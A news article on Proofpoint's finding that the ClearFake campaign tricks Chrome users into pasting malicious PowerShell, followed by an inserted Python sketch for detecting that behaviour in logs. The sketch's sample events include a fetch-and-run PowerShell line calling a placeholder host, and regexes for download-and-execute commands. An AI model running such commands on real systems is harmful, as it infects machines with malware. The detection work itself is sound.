Proofpoint uncovers social engineering technique
Proofpoint has uncovered a new social engineering technique that attempts to coerce victims into copying and pasting malicious PowerShell scripts, infecting their own computers with malware.
The technique targets users of Google’s popular Chrome web browser. It has been observed as early as 1 March by the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.
As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ in order to access the page properly. The message includes a button that copies code into the user’s cache and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.
In the attack campaign observed by Proofpoint in May, the malicious code performed functions that can include flushing the DNS cache, removing clipboard content, displaying a decoy message to the user and downloading a remote PowerShell script and executing it in-memory.
The remote PowerShell script was used to download another PowerShell script, which itself obtained system temperatures as a check against virtual environments and sandboxes. If none are found, it downloads a fourth PowerShell script that retrieves a file named data.zip and extracts its contents to find any .exe files.
This method was then used to download payloads including cryptocurrency miners, as well as a clipboard hijacker designed to replace cryptocurrency addresses in the clipboard with threat actor-controlled addresses.
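The chain described above leaves behaviour in PowerShell script-block logs (Windows event 4104) that a security team can hunt for. The following is an added detection sketch, not code from Proofpoint or the article; the indicator regexes and the sample events are constructed for illustration and are not a vendor rule.

```python
"""Score PowerShell script-block text for the behaviours in the article:
DNS-cache flush, clipboard wiping, remote fetch with in-memory execution,
a thermal-sensor sandbox check, and a data.zip download."""
import re
from typing import Dict, List

# Indicator name -> regex. Each maps to one behaviour described in the article.
# Patterns are illustrative assumptions, not a published detection rule.
INDICATORS: Dict[str, re.Pattern] = {
    "dns_flush": re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard|\bclip(\.exe)?\b", re.I),
    "remote_fetch": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "thermal_sandbox_check": re.compile(r"MSAcpi_ThermalZoneTemperature|CurrentTemperature", re.I),
    "data_zip": re.compile(r"data\.zip", re.I),
}

# Remote fetch combined with in-memory execution is the core of the chain.
HIGH_CONFIDENCE = {"remote_fetch", "in_memory_exec"}


def match_indicators(script_text: str) -> List[str]:
    """Return the names of every indicator present in one script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]


def classify(script_text: str) -> str:
    """'alert' when fetch+exec co-occur or 3+ indicators hit; 'suspicious' on any hit."""
    hits = set(match_indicators(script_text))
    if HIGH_CONFIDENCE <= hits or len(hits) >= 3:
        return "alert"
    return "suspicious" if hits else "clean"


# Constructed sample events shaped like the ScriptBlockText field of event 4104.
SAMPLE_EVENTS = [
    {"id": 1, "text": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"id": 2, "text": "ipconfig /flushdns; Set-Clipboard -Value ''; "
                      "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"},
    {"id": 3, "text": "Invoke-WebRequest -Uri http://example.invalid/data.zip -OutFile $env:TEMP\\data.zip"},
]


def triage(events) -> Dict[int, str]:
    """Map each event id to its verdict."""
    return {e["id"]: classify(e["text"]) for e in events}


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["id"], classify(event["text"]), match_indicators(event["text"]))
```

Event 2 hits four indicators and is flagged as an alert; event 3 shows only the staged-download stage and is marked suspicious for analyst review.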
“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”